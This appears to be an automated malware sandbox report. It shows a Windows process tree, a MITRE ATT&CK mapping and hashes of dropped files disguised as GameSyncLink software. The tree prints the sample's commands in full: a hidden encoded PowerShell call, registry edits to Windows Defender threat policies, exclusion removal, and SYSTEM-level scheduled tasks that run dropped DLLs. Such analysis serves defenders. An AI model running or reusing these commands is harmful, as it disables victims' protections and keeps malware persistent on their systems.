C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
PID:5324

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:1688

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:6768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2956
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6860

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\aJKkcAi.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\aJKkcAi.exe GH /aacydidwf 385118 /S
1⤵
PID:3808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6692
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:4520
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5284
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4788
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:4032
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:7156
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:7244
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5724
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:512
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5404
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6768
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:8164
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:408
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:7848
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6528
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7240
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5840
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:2232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6236
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:3476
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:4732
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1836
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:2456
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\sAgEui.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:7268
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\TgMWKab.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1688
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:4660
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:6944
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\KGqdYIY.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\yolIFzh.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:7820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\HwdlKIR.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:7012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\fKJuhZq.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 08:26:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CMiEpKMg\yTPBQHQ.dll\",#1 /IdidvBl 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:7792
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "rrqYunoktxOQmCoCX"
  2⤵
  PID:6712
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:5436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1952

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8168

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
PID:7776

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:4156

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:7936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7540

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5784

C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\GuodtKN.exe
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\GuodtKN.exe GH /UoksdidCf 385118 /S
1⤵
PID:7128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:7252
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:960
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2268
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:7352
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:6080
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6052
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:6640
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5380
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:7240
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:7736
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6644
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5796
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6712
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6980
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:2168
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5740
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5636
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
  2⤵
  PID:6848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4156
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5244
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6848
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:3676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\SSLUHm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\DvxUJiI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:6344
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
  2⤵
  PID:7224
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\kOlUyKf.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:7104
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\cYgnYTV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6676
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\GPrpLnb.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:7284
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\SUDOGBy.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:7272
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
  2⤵
  PID:3140

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\CMiEpKMg\yTPBQHQ.dll",#1 /IdidvBl 385118
1⤵
PID:7296
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\CMiEpKMg\yTPBQHQ.dll",#1 /IdidvBl 385118
  2⤵
  PID:7900
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
    3⤵
    PID:6384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6600

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:7412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
PID:6024

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:6068

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7236

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6428

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:7188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\GameService.exe

Filesize
288KB

MD5
d9ec6f3a3b2ac7cd5eef07bd86e3efbc

SHA1
e1908caab6f938404af85a7df0f80f877a4d9ee6

SHA256
472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

SHA512
1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

Filesize
2.5MB

MD5
e6943a08bb91fc3086394c7314be367d

SHA1
451d2e171f906fa6c43f8b901cd41b0283d1fa40

SHA256
aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

SHA512
505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

Download Submit
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

Filesize
6.2MB

MD5
1bacbebf6b237c75dbe5610d2d9e1812

SHA1
3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

SHA256
c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

SHA512
f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

Download Submit
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

Filesize
13.2MB

MD5
72b396a9053dff4d804e07ee1597d5e3

SHA1
5ec4fefa66771613433c17c11545c6161e1552d5

SHA256
d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

SHA512
ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

Download Submit
C:\Program Files (x86)\GameSyncLink\installc.bat

Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat

Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
8be18cd01d8921b97c2b15d074f4adc4

SHA1
c9f974bf6221fd53eb440445d0d19e81d3939be5

SHA256
831d1403cc0d873571a09a98e3d9ca44a1fc586228b56ab7bcc317a93490cb26

SHA512
92bda5c1c799f553e82a4838e4d2153a4a05480ae9b867b5c2de9281859f82759be884469db59b008a6f14c9e9f3f06bc74fd255656b87c61d41097a16767159

Download Submit
C:\Program Files\iolo technologies\System Mechanic\iolo.exe

Filesize
4.2MB

MD5
f6eca7e16e9cfdf960606e69512048ed

SHA1
57db1be6a3028f42b46936487031c71a6d48b9d9

SHA256
88bcd01465266fba6cccf6b512d3fbde701cfa66bae0e1534a855828ad1df247

SHA512
f7a860aa4048cdce9e0b20618c0b35ec6b9e2920d2569e56066c83ef04f5b9863c769d7b6d65775a4899b3c5a40d0be170c2e6888b0f8e6c488bf6ca79dd8575

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
